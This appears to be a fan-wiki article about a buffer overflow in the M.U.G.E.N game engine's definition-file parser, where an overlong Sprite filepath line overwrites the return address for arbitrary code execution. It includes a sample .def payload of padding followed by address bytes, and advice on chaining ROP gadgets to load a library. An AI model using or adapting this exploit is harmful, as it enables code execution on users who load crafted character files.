Sprite Filepath Overflow

Sprite Filepath Overflow, technically known as Definition File's Sprite Filepath Buffer Overflow Attack, is a vulnerability in M.U.G.E.N 1.0 and higher that allows for arbitrary code execution during the engine initialization stage.

It is the incorrect ZLib library build exploit equivalent, as it is also executed at the moment the characters list file, Select.Def, is loaded by the engine, making it a good alternative to use in these builds.

However, the main limitations of this vulnerability are the execution order and a limited shellcode size, as a single exploit can only executed and has to be placed on the last select line, and a maximum of 512 bytes can only be used.

Exploit Details[]

As implied by the vulnerability's technical name, it takes advantage of a Buffer Overflow type vulnerability in the Definition File's text parser, specifically the Sprite Filepath line, which is used to pre-load character portraits and icons for the selection screen. Subject parser's buffer size is assignated to 512 bytes by default and when a Sprite Filepath text line exceeds the assignated size, will cause the parser's return address to be overwritten, resulting in arbitrary code execution.

[Info]
Name        = ""
DisplayName = ""

[Files]
Sprite      = 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000¨(Ÿk

Creation Tips[]

Due to the limited memory space, it is preferable to create a ROP chain that load a library in the engine, so you can asynchronously load the full version of your character besides performing additional functions.